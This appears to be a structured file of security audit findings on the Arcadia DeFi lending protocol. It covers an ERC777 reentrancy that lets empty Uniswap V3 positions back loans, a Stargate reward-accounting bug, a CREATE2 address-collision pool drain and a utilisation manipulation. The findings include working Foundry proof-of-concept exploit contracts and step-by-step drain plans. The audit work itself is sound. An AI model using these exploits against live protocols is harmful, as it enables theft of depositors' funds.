the amount of liquidity held in a Uniswap V3 position, making the protocol believe the Uniswap position has more liquidity than the actual liquidity deposited in the position. This makes it possible to borrow using undercollateralized Uniswap positions.\\nWhen depositing into an account, the `deposit()` function is called, which calls the internal `_deposit()` function. Depositing is performed in two steps:\\nThe registry's `batchProcessDeposit()` function is called. This function checks if the deposited assets can be priced, and in case that a creditor is set, it also updates the exposures and underlying assets for the creditor.\\nThe assets are transferred and deposited into the account.\\n```\\n// AccountV1.sol\\n\\nfunction _deposit(\\n address[] memory assetAddresses,\\n uint256[] memory assetIds,\\n uint256[] memory assetAmounts,\\n address from\\n ) internal {\\n // If no Creditor is set, batchProcessDeposit only checks if the assets can be priced.\\n // If a Creditor is set, batchProcessDeposit will also update the exposures of assets and underlying assets for the Creditor.\\n uint256[] memory assetTypes =\\n IRegistry(registry).batchProcessDeposit(creditor, assetAddresses, assetIds, assetAmounts);\\n\\n for (uint256 i; i < assetAddresses.length; ++i) {\\n // Skip if amount is 0 to prevent storing addresses that have 0 balance.\\n if (assetAmounts[i] == 0) continue;\\n\\n if (assetTypes[i] == 0) {\\n if (assetIds[i] != 0) revert AccountErrors.InvalidERC20Id();\\n _depositERC20(from, assetAddresses[i], assetAmounts[i]);\\n } else if (assetTypes[i] == 1) {\\n if (assetAmounts[i] != 1) revert AccountErrors.InvalidERC721Amount();\\n _depositERC721(from, assetAddresses[i], assetIds[i]);\\n } else if (assetTypes[i] == 2) {\\n _depositERC1155(from, assetAddresses[i], assetIds[i], assetAmounts[i]);\\n } else {\\n revert AccountErrors.UnknownAssetType();\\n }\\n }\\n\\n if (erc20Stored.length + erc721Stored.length + erc1155Stored.length > ASSET_LIMIT) {\\n revert AccountErrors.TooManyAssets();\\n }\\n }\\n```\\n\\nFor Uniswap positions (and assuming that a creditor is set), calling `batchProcessDeposit()` will internally trigger the UniswapV3AM.processDirectDeposit():\\n```\\n// UniswapV3AM.sol\\n\\nfunction processDirectDeposit(address creditor, address asset, uint256 assetId, uint256 amount)\\n public\\n override\\n returns (uint256 recursiveCalls, uint256 assetType)\\n {\\n // Amount deposited of a Uniswap V3 LP can be either 0 or 1 (checked in the Account).\\n // For uniswap V3 every id is a unique asset -> on every deposit the asset must added to the Asset Module.\\n if (amount == 1) _addAsset(assetId);\\n\\n // rest of code\\n }\\n```\\n\\nThe Uniswap position will then be added to the protocol using the internal `_addAsset()` function. One of the most important actions performed inside this function is to store the liquidity that the Uniswap position has in that moment. Such liquidity is obtained from directly querying the NonfungiblePositionManager contract:\\n```\\nfunction _addAsset(uint256 assetId) internal {\\n // rest of code\\n\\n (,, address token0, address token1,,,, uint128 liquidity,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);\\n\\n // No need to explicitly check if token0 and token1 are allowed, _addAsset() is only called in the\\n // deposit functions and there any deposit of non-allowed Underlying Assets will revert.\\n if (liquidity == 0) revert ZeroLiquidity();\\n\\n // The liquidity of the Liquidity Position is stored in the Asset Module,\\n // not fetched from the NonfungiblePositionManager.\\n // Since liquidity of a position can be increased by a non-owner,\\n // the max exposure checks could otherwise be circumvented.\\n assetToLiquidity[assetId] = liquidity;\\n\\n // rest of code\\n }\\n```\\n\\nAs the snippet shows, the liquidity is stored in a mapping because “Since liquidity of a position can be increased by a non-owner, the max exposure checks could otherwise be circumvented.”. From this point forward, and until the Uniswap position is withdrawn from the account, the collateral value (i.e the amount that the position is worth) will be computed utilizing the `_getPosition()` internal function, which will read the cached liquidity value stored in the `assetToLiquidity[assetId]` mapping, rather than directly consulting the NonFungibleManager contract. This way, the position won't be able to surpass the max exposures:\\n```\\n// UniswapV3AM.sol\\n\\nfunction _getPosition(uint256 assetId)\\n internal\\n view\\n returns (address token0, address token1, int24 tickLower, int24 tickUpper, uint128 liquidity)\\n {\\n // For deposited assets, the liquidity of the Liquidity Position is stored in the Asset Module,\\n // not fetched from the NonfungiblePositionManager.\\n // Since liquidity of a position can be increased by a non-owner, the max exposure checks could otherwise be circumvented.\\n liquidity = uint128(assetToLiquidity[assetId]);\\n\\n if (liquidity > 0) {\\n (,, token0, token1,, tickLower, tickUpper,,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);\\n } else {\\n // Only used as an off-chain view function by getValue() to return the value of a non deposited Liquidity Position.\\n (,, token0, token1,, tickLower, tickUpper, liquidity,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);\\n }\\n }\\n```\\n\\nHowever, storing the liquidity leads to an attack vector that allows Uniswap positions' liquidity to be comlpetely withdrawn while making the protocol believe that the Uniswap position is still full.\\nAs mentioned in the beginning of the report, the deposit process is done in two steps: processing assets in the registry and transferring the actual assets to the account. Because processing assets in the registry is the step where the Uniswap position's liquidity is cached, a malicious depositor can use an ERC777 hook in the transferring process to withdraw the liquidity in the Uniswap position.\\nThe following steps show how the attack could be performed:\\nInitially, a malicious contract must be created. This contract will be the one holding the assets and depositing them into the account, and will also be able to trigger the ERC777's `tokensToSend()` hook.\\nThe malicious contract will call the account's `deposit()` function with two `assetAddresses` to be deposited: the first asset must be an ERC777 token, and the second asset must be the Uniswap position.\\n`IRegistry(registry).batchProcessDeposit()` will then execute. This is the first of the two steps taking place to deposit assets, where the liquidity from the Uniswap position will be fetched from the NonFungiblePositionManager and stored in the `assetToLiquidity[assetId]` mapping.\\nAfter processing the assets, the transferring phase will start. The first asset to be transferred will be the ERC777 token. This will trigger the `tokensToSend()` hook in our malicious contract. At this point, our contract is still the owner of the Uniswap position (the Uniswap position won't be transferred until the ERC777 transfer finishes), so the liquidity in the Uniswap position can be decreased inside the hook triggered in the malicious contract. This leaves the Uniswap position with a smaller liquidity amount than the one stored in the `batchProcessDeposit()` step, making the protocol believe that the liquidity stored in the position is the one that the position had prior to starting the attack.\\nFinally, and following the transfer of the ERC777 token, the Uniswap position will be transferred and succesfully deposited in the account. Arcadia will believe that the account has a Uniswap position worth some liquidity, when in reality the Uni position will be empty.\\nProof of Concept\\nThis proof of concept show show the previous attack can be performed so that the liquidity in the uniswap position is 0, while the collateral value for the account is far greater than 0.\\nCreate a `ERC777Mock.sol` file in `lib/accounts-v2/test/utils/mocks/tokens` and paste the code found in this github gist.\\nImport the ERC777Mock and change the MockOracles, MockERC20 and Rates structs in `lib/accounts-v2/test/utils/Types.sol` to add an additional `token777ToUsd`, `token777` of type ERC777Mock and `token777ToUsd` rate:\\n`import \"../utils/mocks/tokens/ERC777Mock.sol\"; // <----- Import this\\n\\n...\\n\\nstruct MockOracles {\\n ArcadiaOracle stable1ToUsd;\\n ArcadiaOracle stable2ToUsd;\\n ArcadiaOracle token1ToUsd;\\n ArcadiaOracle token2ToUsd;\\n ArcadiaOracle token3ToToken4;\\n ArcadiaOracle token4ToUsd;\\n ArcadiaOracle token777ToUsd; // <----- Add this\\n ArcadiaOracle nft1ToToken1;\\n ArcadiaOracle nft2ToUsd;\\n ArcadiaOracle nft3ToToken1;\\n ArcadiaOracle sft1ToToken1;\\n ArcadiaOracle sft2ToUsd;\\n}\\n\\nstruct MockERC20 {\\n ERC20Mock stable1;\\n ERC20Mock stable2;\\n ERC20Mock token1;\\n ERC20Mock token2;\\n ERC20Mock token3;\\n ERC20Mock token4;\\n ERC777Mock token777; // <----- Add this\\n}\\n\\n...\\n\\nstruct Rates {\\n uint256 stable1ToUsd;\\n uint256 stable2ToUsd;\\n uint256 token1ToUsd;\\n uint256 token2ToUsd;\\n uint256 token3ToToken4;\\n uint256 token4ToUsd;\\n uint256 token777ToUsd; // <----- Add this\\n uint256 nft1ToToken1;\\n uint256 nft2ToUsd;\\n uint256 nft3ToToken1;\\n uint256 sft1ToToken1;\\n uint256 sft2ToUsd;\\n}`\\nReplace the contents inside `lib/accounts-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nNext step is to replace the file found in `lending-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nCreate a `PocUniswap.t.sol` file in `lending-v2/test/fuzz/LendingPool/PocUniswap.t.sol` and paste the following code snippet into it:\\n`/**\\n * Created by Pragma Labs\\n * SPDX-License-Identifier: BUSL-1.1\\n */\\npragma solidity 0.8.22;\\n\\nimport { LendingPool_Fuzz_Test } from \"./_LendingPool.fuzz.t.sol\";\\n\\nimport { IPermit2 } from \"../../../lib/accounts-v2/src/interfaces/IPermit2.sol\";\\nimport { UniswapV3AM_Fuzz_Test, UniswapV3Fixture, UniswapV3AM, IUniswapV3PoolExtension, TickMath } from \"../../../lib/accounts-v2/test/fuzz/asset-modules/UniswapV3AM/_UniswapV3AM.fuzz.t.sol\";\\nimport { ERC20Mock } from \"../../../lib/accounts-v2/test/utils/mocks/tokens/ERC20Mock.sol\";\\n\\nimport \"forge-std/console.sol\";\\n\\ninterface IERC721 {\\n function ownerOf(uint256 tokenid) external returns(address);\\n function approve(address spender, uint256 tokenId) external;\\n}\\n \\n/// @notice Proof of Concept - Arcadia\\ncontract Poc is LendingPool_Fuzz_Test, UniswapV3AM_Fuzz_Test { \\n\\n /////////////////////////////////////////////////////////////////\\n // CONSTANTS //\\n /////////////////////////////////////////////////////////////////\\n int24 private MIN_TICK = -887_272;\\n int24 private MAX_TICK = -MIN_TICK;\\n\\n /////////////////////////////////////////////////////////////////\\n // STORAGE //\\n /////////////////////////////////////////////////////////////////\\n AccountOwner public accountOwnerContract;\\n ERC20Mock token0;\\n ERC20Mock token1;\\n uint256 tokenId;\\n\\n /////////////////////////////////////////////////////////////////\\n // SETUP //\\n /////////////////////////////////////////////////////////////////\\n\\n function setUp() public override(LendingPool_Fuzz_Test, UniswapV3AM_Fuzz_Test) {\\n // Setup pool test\\n LendingPool_Fuzz_Test.setUp();\\n\\n // Deploy fixture for Uniswap.\\n UniswapV3Fixture.setUp();\\n\\n deployUniswapV3AM(address(nonfungiblePositionManager));\\n\\n vm.startPrank(users.riskManager);\\n registryExtension.setRiskParametersOfDerivedAM(\\n address(pool), address(uniV3AssetModule), type(uint112).max, 100\\n );\\n \\n token0 = mockERC20.token1;\\n token1 = mockERC20.token2;\\n (token0, token1) = token0 < token1 ? (token0, token1) : (token1, token0);\\n\\n // Deploy account owner\\n accountOwnerContract = new AccountOwner(address(nonfungiblePositionManager));\\n\\n \\n // Set origination fee\\n vm.startPrank(users.creatorAddress);\\n pool.setOriginationFee(100); // 1%\\n\\n // Transfer ownership to Account Owner \\n vm.startPrank(users.accountOwner);\\n factory.safeTransferFrom(users.accountOwner, address(accountOwnerContract), address(proxyAccount));\\n vm.stopPrank();\\n \\n\\n // Mint uniswap position underlying tokens to accountOwnerContract\\n mockERC20.token1.mint(address(accountOwnerContract), 100 ether);\\n mockERC20.token2.mint(address(accountOwnerContract), 100 ether);\\n\\n // Open Uniswap position \\n tokenId = _openUniswapPosition();\\n \\n\\n // Transfer some ERC777 tokens to accountOwnerContract. These will be used to be deposited as collateral into the account\\n vm.startPrank(users.liquidityProvider);\\n mockERC20.token777.transfer(address(accountOwnerContract), 1 ether);\\n }\\n\\n /////////////////////////////////////////////////////////////////\\n // POC //\\n /////////////////////////////////////////////////////////////////\\n /// @notice Test exploiting the reentrancy vulnerability. \\n function testVuln_borrowUsingUndercollateralizedUniswapPosition(\\n uint128 amountLoaned,\\n uint112 collateralValue,\\n uint128 liquidity,\\n uint8 originationFee\\n ) public { \\n\\n //---------- STEP 1 ----------//\\n // Open margin account setting pool as new creditor\\n vm.startPrank(address(accountOwnerContract));\\n proxyAccount.openMarginAccount(address(pool)); \\n \\n //---------- STEP 2 ----------//\\n // Deposit assets into account. The order of the assets to be deposited is important. The first asset will be an ERC777 token that triggers the callback on transferring.\\n // The second asset will be the uniswap position.\\n\\n address[] memory assetAddresses = new address[](2);\\n assetAddresses[0] = address(mockERC20.token777);\\n assetAddresses[1] = address(nonfungiblePositionManager);\\n uint256[] memory assetIds = new uint256[](2);\\n assetIds[0] = 0;\\n assetIds[1] = tokenId;\\n uint256[] memory assetAmounts = new uint256[](2);\\n assetAmounts[0] = 1; // no need to send more than 1 wei as the ERC777 only serves to trigger the callback\\n assetAmounts[1] = 1;\\n // Set approvals\\n IERC721(address(nonfungiblePositionManager)).approve(address(proxyAccount), tokenId);\\n mockERC20.token777.approve(address(proxyAccount), type(uint256).max);\\n\\n // Perform deposit. \\n // Deposit will perform two steps:\\n // 1. processDeposit(): this step will handle the deposited assets and verify everything is correct. For uniswap positions, the liquidity in the position\\n // will be stored in the `assetToLiquidity` mapping.\\n // 2.Transferring the assets: after processing the assets, the actual asset transfers will take place. First, the ER777 colallateral will be transferred. \\n // This will trigger the callback in the accountOwnerContract (the account owner), which will withdraw all the uniswap position liquidity. Because the uniswap \\n // position liquidity has been cached in step 1 (processDeposit()), the protocol will still believe that the uniswap position has some liquidity, when in reality\\n // all the liquidity from the position has been withdrawn in the ERC777 `tokensToSend()` callback. \\n proxyAccount.deposit(assetAddresses, assetIds, assetAmounts);\\n\\n //---------- FINAL ASSERTIONS ----------//\\n // Collateral value fetches the `assetToLiquidity` value cached prior to removing position liquidity. This does not reflect that the position is empty,\\n // hence it is possible to borrow with an empty uniswap position.\\n uint256 finalCollateralValue = proxyAccount.getCollateralValue();\\n\\n // Liquidity in the position is 0.\\n (\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n uint128 liquidity,\\n ,\\n ,\\n ,\\n ) = nonfungiblePositionManager.positions(tokenId); \\n\\n console.log(\"Collateral value of account:\", finalCollateralValue);\\n console.log(\"Actual liquidity in position\", liquidity);\\n\\n assertEq(liquidity, 0);\\n assertGt(finalCollateralValue, 1000 ether); // Collateral value is greater than 1000\\n } \\n\\n function _openUniswapPosition() internal returns(uint256 tokenId) {\\n vm.startPrank(address(accountOwnerContract));\\n \\n uint160 sqrtPriceX96 = uint160(\\n calculateAndValidateRangeTickCurrent(\\n 10 * 10**18, // priceToken0\\n 20 * 10**18 // priceToken1\\n )\\n );\\n\\n // Create Uniswap V3 pool initiated at tickCurrent with cardinality 300.\\n IUniswapV3PoolExtension uniswapPool = createPool(token0, token1, TickMath.getSqrtRatioAtTick(TickMath.getTickAtSqrtRatio(sqrtPriceX96)), 300);\\n\\n // Approve liquidity\\n mockERC20.token1.approve(address(uniswapPool), type(uint256).max);\\n mockERC20.token2.approve(address(uniswapPool), type(uint256).max);\\n\\n // Mint liquidity position.\\n uint128 liquidity = 100 * 10**18;\\n tokenId = addLiquidity(uniswapPool, liquidity, address(accountOwnerContract), MIN_TICK, MAX_TICK, false);\\n \\n assertEq(IERC721(address(nonfungiblePositionManager)).ownerOf(tokenId), address(accountOwnerContract));\\n }\\n \\n}\\n\\n/// @notice ERC777Sender interface\\ninterface IERC777Sender {\\n /**\\n * @dev Called by an {IERC777} token contract whenever a registered holder's\\n * (`from`) tokens are about to be moved or destroyed. The type of operation\\n * is conveyed by `to` being the zero address or not.\\n *\\n * This call occurs _before_ the token contract's state is updated, so\\n * {IERC777-balanceOf}, etc., can be used to query the pre-operation state.\\n *\\n * This function may revert to prevent the operation from being executed.\\n */\\n function tokensToSend(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external;\\n}\\n\\ninterface INonfungiblePositionManager {\\n function positions(uint256 tokenId)\\n external\\n view\\n returns (\\n uint96 nonce,\\n address operator,\\n address token0,\\n address token1,\\n uint24 fee,\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity,\\n uint256 feeGrowthInside0LastX128,\\n uint256 feeGrowthInside1LastX128,\\n uint128 tokensOwed0,\\n uint128 tokensOwed1\\n );\\n\\n struct DecreaseLiquidityParams {\\n uint256 tokenId;\\n uint128 liquidity;\\n uint256 amount0Min;\\n uint256 amount1Min;\\n uint256 deadline;\\n }\\n function decreaseLiquidity(DecreaseLiquidityParams calldata params)\\n external\\n payable\\n returns (uint256 amount0, uint256 amount1);\\n}\\n\\n /// @notice AccountOwner contract that will trigger the attack via ERC777's `tokensToSend()` callback\\ncontract AccountOwner is IERC777Sender {\\n\\n INonfungiblePositionManager public nonfungiblePositionManager;\\n\\n constructor(address _nonfungiblePositionManager) {\\n nonfungiblePositionManager = INonfungiblePositionManager(_nonfungiblePositionManager);\\n }\\n\\n function tokensToSend(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external {\\n // Remove liquidity from Uniswap position\\n (\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n uint128 liquidity,\\n ,\\n ,\\n ,\\n ) = nonfungiblePositionManager.positions(1); // tokenId 1\\n\\n INonfungiblePositionManager.DecreaseLiquidityParams memory params = INonfungiblePositionManager.DecreaseLiquidityParams({\\n tokenId: 1,\\n liquidity: liquidity,\\n amount0Min: 0,\\n amount1Min: 0,\\n deadline: block.timestamp\\n });\\n nonfungiblePositionManager.decreaseLiquidity(params);\\n }\\n \\n\\n function onERC721Received(address, address, uint256, bytes calldata) public pure returns (bytes4) {\\n return bytes4(abi.encodeWithSignature(\"onERC721Received(address,address,uint256,bytes)\"));\\n }\\n\\n}`\\nExecute the following command being inside the `lending-v2` folder: `forge test --mt testVuln_borrowUsingUndercollateralizedUniswapPosition -vvvvv`.\\nNOTE: It is possible that you find issues related to code not being found. This is because the Uniswap V3 deployment uses foundry's `vm.getCode()` and we are importing the deployment file from the `accounts-v2` repo to the `lending-v2` repo, which makes foundry throw some errors. To fix this, just compile the contracts in the `accounts-v2` repo and copy the missing folders from the `accounts-v2/out` generated folder into the `lending-v2/out` folder.чThere are several ways to mitigate this issue. One possible option is to perform the transfer of assets when depositing at the same time that the asset is processed, instead of first processing the assets (and storing the Uniswap liquidity) and then transferring them. Another option is to perform a liquidity check after depositing the Uniswap position, ensuring that the liquidity stored in the assetToLiquidity[assetId] mapping and the one returned by the NonFungiblePositionManager are the same.чHigh. The protocol will always believe that there is liquidity deposited in the Uniswap position while in reality the position is empty. This allows for undercollateralized borrows, essentially enabling the protocol to be drained if the attack is performed utilizing several uniswap positions.ч```\\n// AccountV1.sol\\n\\nfunction _deposit(\\n address[] memory assetAddresses,\\n uint256[] memory assetIds,\\n uint256[] memory assetAmounts,\\n address from\\n ) internal {\\n // If no Creditor is set, batchProcessDeposit only checks if the assets can be priced.\\n // If a Creditor is set, batchProcessDeposit will also update the exposures of assets and underlying assets for the Creditor.\\n uint256[] memory assetTypes =\\n IRegistry(registry).batchProcessDeposit(creditor, assetAddresses, assetIds, assetAmounts);\\n\\n for (uint256 i; i < assetAddresses.length; ++i) {\\n // Skip if amount is 0 to prevent storing addresses that have 0 balance.\\n if (assetAmounts[i] == 0) continue;\\n\\n if (assetTypes[i] == 0) {\\n if (assetIds[i] != 0) revert AccountErrors.InvalidERC20Id();\\n _depositERC20(from, assetAddresses[i], assetAmounts[i]);\\n } else if (assetTypes[i] == 1) {\\n if (assetAmounts[i] != 1) revert AccountErrors.InvalidERC721Amount();\\n _depositERC721(from, assetAddresses[i], assetIds[i]);\\n } else if (assetTypes[i] == 2) {\\n _depositERC1155(from, assetAddresses[i], assetIds[i], assetAmounts[i]);\\n } else {\\n revert AccountErrors.UnknownAssetType();\\n }\\n }\\n\\n if (erc20Stored.length + erc721Stored.length + erc1155Stored.length > ASSET_LIMIT) {\\n revert AccountErrors.TooManyAssets();\\n }\\n }\\n```\\n -Stargate `STG` rewards are accounted incorrectly by `StakedStargateAM.sol`чmediumчStargate LP_STAKING_TIME contract clears and sends rewards to the caller every time `deposit()` is called but StakedStargateAM does not take it into account.\\nWhen either mint() or increaseLiquidity() are called the `assetState[asset].lastRewardGlobal` variable is not reset to `0` even though the rewards have been transferred and accounted for on stargate side.\\nAfter a call to mint() or increaseLiquidity() any subsequent call to either mint(), increaseLiquidity(), burn(), decreaseLiquidity(), claimRewards() or rewardOf(), which all internally call _getRewardBalances(), will either revert for underflow or account for less rewards than it should because `assetState_.lastRewardGlobal` has not been correctly reset to `0` but `currentRewardGlobal` (which is fetched from stargate) has:\\n```\\nuint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);\\nuint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal; ❌\\n```\\n\\n```\\nfunction _getCurrentReward(address asset) internal view override returns (uint256 currentReward) {\\n currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));\\n}\\n```\\n\\nPOC\\nTo copy-paste in USDbCPool.fork.t.sol:\\n```\\nfunction testFork_WrongRewards() public {\\n uint256 initBalance = 1000 * 10 ** USDbC.decimals();\\n // Given : A user deposits in the Stargate USDbC pool, in exchange of an LP token.\\n vm.startPrank(users.accountOwner);\\n deal(address(USDbC), users.accountOwner, initBalance);\\n\\n USDbC.approve(address(router), initBalance);\\n router.addLiquidity(poolId, initBalance, users.accountOwner);\\n // assert(ERC20(address(pool)).balanceOf(users.accountOwner) > 0);\\n\\n // And : The user stakes the LP token via the StargateAssetModule\\n uint256 stakedAmount = ERC20(address(pool)).balanceOf(users.accountOwner);\\n ERC20(address(pool)).approve(address(stakedStargateAM), stakedAmount);\\n uint256 tokenId = stakedStargateAM.mint(address(pool), uint128(stakedAmount) / 4);\\n\\n //We let 10 days pass to accumulate rewards.\\n vm.warp(block.timestamp + 10 days);\\n\\n // User increases liquidity of the position.\\n uint256 initialRewards = stakedStargateAM.rewardOf(tokenId);\\n stakedStargateAM.increaseLiquidity(tokenId, 1);\\n\\n vm.expectRevert();\\n stakedStargateAM.burn(tokenId); //❌ User can't call burn because of underflow\\n\\n //We let 10 days pass, this accumulates enough rewards for the call to burn to succeed\\n vm.warp(block.timestamp + 10 days);\\n uint256 currentRewards = stakedStargateAM.rewardOf(tokenId);\\n stakedStargateAM.burn(tokenId);\\n\\n assert(currentRewards - initialRewards < 1e10); //❌ User gets less rewards than he should. The rewards of the 10 days the user couldn't withdraw his position are basically zeroed out.\\n vm.stopPrank();\\n}\\n```\\nчAdjust the `assetState[asset].lastRewardGlobal` correctly or since every action (mint(), `burn()`, `increaseLiquidity()`, `decreaseliquidity()`, claimReward()) will have the effect of withdrawing all the current rewards it's possible to change the function _getRewardBalances() to use the amount returned by _getCurrentReward() as the `deltaReward` directly:\\n```\\nuint256 deltaReward = _getCurrentReward(positionState_.asset);\\n```\\nчUsers will not be able to take any action on their positions until `currentRewardGlobal` is greater or equal to `assetState_.lastRewardGlobal`. After that they will be able to perform actions but their position will account for less rewards than it should because a total amount of `assetState_.lastRewardGlobal` rewards is nullified.\\nThis will also DOS the whole lending/borrowing system if an Arcadia Stargate position is used as collateral because rewardOf(), which is called to estimate the collateral value, also reverts.ч```\\nuint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);\\nuint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal; ❌\\n```\\n -`CREATE2` address collision against an Account will allow complete draining of lending poolsчmediumчThe factory function `createAccount()` creates a new account contract for the user using `CREATE2`. We show that a meet-in-the-middle attack at finding an address collision against an undeployed account is possible. Furthermore, such an attack allows draining of all funds from the lending pool.\\nThe attack consists of two parts: Finding a collision, and actually draining the lending pool. We describe both here:\\nPoC: Finding a collision\\nNote that in `createAccount`, `CREATE2` salt is user-supplied, and `tx.origin` is technically also user-supplied:\\n```\\naccount = address(\\n new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(\\n versionInformation[accountVersion].implementation\\n )\\n);\\n```\\n\\nThe address collision an attacker will need to find are:\\nOne undeployed Arcadia account address (1).\\nArbitrary attacker-controlled wallet contract (2).\\nBoth sets of addresses can be brute-force searched because:\\nAs shown above, `salt` is a user-supplied parameter. By brute-forcing many `salt` values, we have obtained many different (undeployed) wallet accounts for (1).\\n(2) can be searched the same way. The contract just has to be deployed using `CREATE2`, and the `salt` is in the attacker's control by definition.\\nAn attacker can find any single address collision between (1) and (2) with high probability of success using the following meet-in-the-middle technique, a classic brute-force-based attack in cryptography:\\nBrute-force a sufficient number of values of salt ($2^{80}$), pre-compute the resulting account addresses, and efficiently store them e.g. in a Bloom filter data structure.\\nBrute-force contract pre-computation to find a collision with any address within the stored set in step 1.\\nThe feasibility, as well as detailed technique and hardware requirements of finding a collision, are sufficiently described in multiple references:\\n1: A past issue on Sherlock describing this attack.\\n2: EIP-3607, which rationale is this exact attack. The EIP is in final state.\\n3: A blog post discussing the cost (money and time) of this exact attack.\\nThe hashrate of the BTC network has reached $6 \\times 10^{20}$ hashes per second as of time of writing, taking only just $33$ minutes to achieve $2^{80}$ hashes. A fraction of this computing power will still easily find a collision in a reasonably short timeline.\\nPoC: Draining the lending pool\\nEven given EIP-3607 which disables an EOA if a contract is already deployed on top, we show that it's still possible to drain the lending pool entirely given a contract collision.\\nAssuming the attacker has already found an address collision against an undeployed account, let's say `0xCOLLIDED`. The steps for complete draining of a lending pool are as follow:\\nFirst tx:\\nDeploy the attack contract onto address `0xCOLLIDED`.\\nSet infinite allowance for {0xCOLLIDED ---> attacker wallet} for any token they want.\\nDestroy the contract using `selfdestruct`.\\nPost Dencun hardfork, `selfdestruct` is still possible if the contract was created in the same transaction. The only catch is that all 3 of these steps must be done in one tx.\\nThe attacker now has complete control of any funds sent to `0xCOLLIDED`.\\nSecond tx:\\nDeploy an account to `0xCOLLIDED`.\\nDeposit an asset, collateralize it, then drain the collateral using the allowance set in tx1.\\nRepeat step 2 for as long as they need to (i.e. collateralize the same asset multiple times).\\nThe account at `0xCOLLIDED` is now infinitely collateralized.\\nFunds for step 2 and 3 can be obtained through external flash loan. Simply return the funds when this step is finished.\\nAn infinitely collateralized account has infinite borrow power. Simply borrow all the funds from the lending pool and run away with it, leaving an infinity collateral account that actually holds no funds.\\nThe attacker has stolen all funds from the lending pool.\\nCoded unit-PoC\\nWhile we cannot provide an actual hash collision due to infrastructural constraints, we are able to provide a coded PoC to prove the following two properties of the EVM that would enable this attack:\\nA contract can be deployed on top of an address that already had a contract before.\\nBy deploying a contract and self-destruct in the same tx, we are able to set allowance for an address that has no bytecode.\\nHere is the PoC, as well as detailed steps to recreate it:\\nThe provided PoC has been tested on Remix IDE, on the Remix VM - Mainnet fork environment, as well as testing locally on the Holesky testnet fork, which as of time of writing, has been upgraded with the Dencun hardfork.чThe mitigation method is to prevent controlling over the deployed account address (or at least severely limit that). Some techniques may be:\\nDo not allow a user-supplied `salt`, as well as do not use the user address as a determining factor for the `salt`.\\nUse the vanilla contract creation with `CREATE`, as opposed to `CREATE2`. The contract's address is determined by `msg.sender` (the factory), and the internal `nonce` of the factory (for a contract, this is just \"how many other contracts it has deployed\" plus one).\\nThis will prevent brute-forcing of one side of the collision, disabling the $O(2^{81})$ search technique.чComplete draining of a lending pool if an address collision is found.\\nWith the advancement of computing hardware, the cost of an attack has been shown to be just a few million dollars, and that the current Bitcoin network hashrate allows about $2^{80}$ in about half an hour. The cost of the attack may be offsetted with longer brute force time.\\nFor a DeFi lending pool, it is normal for a pool TVL to reach tens or hundreds of millions in USD value (top protocols' TVL are well above the billions). It is then easy to show that such an attack is massively profitable.ч```\\naccount = address(\\n new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(\\n versionInformation[accountVersion].implementation\\n )\\n);\\n```\\n -Utilisation Can Be Manipulated Far Above 100%чmediumчThe utilisation of the protocol can be manipulated far above 100% via token donation. It is easiest to set this up on an empty pool. This can be used to manipulate the interest to above 10000% per minute to steal from future depositors.\\nThe utilisation is basically assets_borrowed / assets_loaned. A higher utilisation creates a higher interest rate. This is assumed to be less than 100%. However if it exceeds 100%, there is no cap here:\\nNormally, assets borrowed should never exceed assets loaned, however this is possible in Arcadia as the only thing stopping a borrow exceeding loans is that the `transfer` of tokens will revert due to not enough tokens in the `Lending pool`. However, an attacker can make it not revert by simply sending tokens directly into the lending pool. For example using the following sequence:\\ndeposit 100 assets into tranche\\nUse ERC20 Transfer to transfer `1e18` assets into the `LendingPool`\\nBorrow the `1e18` assets\\nThese are the first steps of the coded POC at the bottom of this issue. It uses a token donation to make a borrow which is far larger than the loan amount.\\nIn the utilisation calculation, this results in a incredibly high utilisation rate and thus interest rate as it is not capped at 100%. This is why some protocols implement a hardcap of utilisation at 100%.\\nThe interest rate is so high that over 2 minutes, 100 assets grows to over100000 assets, or a 100000% interest over 2 minutes. The linked similar exploit on Silo Finance has an even more drastic interest manipulation which could drain the whole protocol in a block. However I did not optimise the numbers for this POC.\\nNote that the 1e18 assets \"donated\" to the protocol are not lost. They can simply be all borrowed into an attackers account.\\nThe attacker can set this up when the initial lending pool is empty. Then, they can steal assets from subsequent depositors due to the huge amount of interest collected from their small initial deposit\\nLet me sum up the attack in the POC:\\ndeposit 100 assets into tranche\\nUse ERC20 Transfer to transfer `1e18` assets into the `LendingPool`\\nBorrow the `1e18` assets\\nVictim deposits into tranche\\nAttacker withdraws the victims funds which is greater than the 100 assets the attacker initially deposited\\nHere is the output from the console.logs:\\n```\\nRunning 1 test for test/scenario/BorrowAndRepay.scenario.t.sol:BorrowAndRepay_Scenario_Test\\n[PASS] testScenario_Poc() (gas: 799155)\\nLogs:\\n 100 initial pool balance. This is also the amount deposited into tranche\\n warp 2 minutes into future\\n mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack\\n 22 shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!\\n```\\n\\nThis is the edited version of `setUp()` in `_scenario.t.sol`\\n```\\nfunction setUp() public virtual override(Fuzz_Lending_Test) {\\n Fuzz_Lending_Test.setUp();\\n deployArcadiaLendingWithAccounts();\\n\\n vm.prank(users.creatorAddress);\\n pool.addTranche(address(tranche), 50);\\n\\n // Deposit funds in the pool.\\n deal(address(mockERC20.stable1), users.liquidityProvider, type(uint128).max, true);\\n\\n vm.startPrank(users.liquidityProvider);\\n mockERC20.stable1.approve(address(pool), 100);\\n //only 1 asset was minted to the liquidity 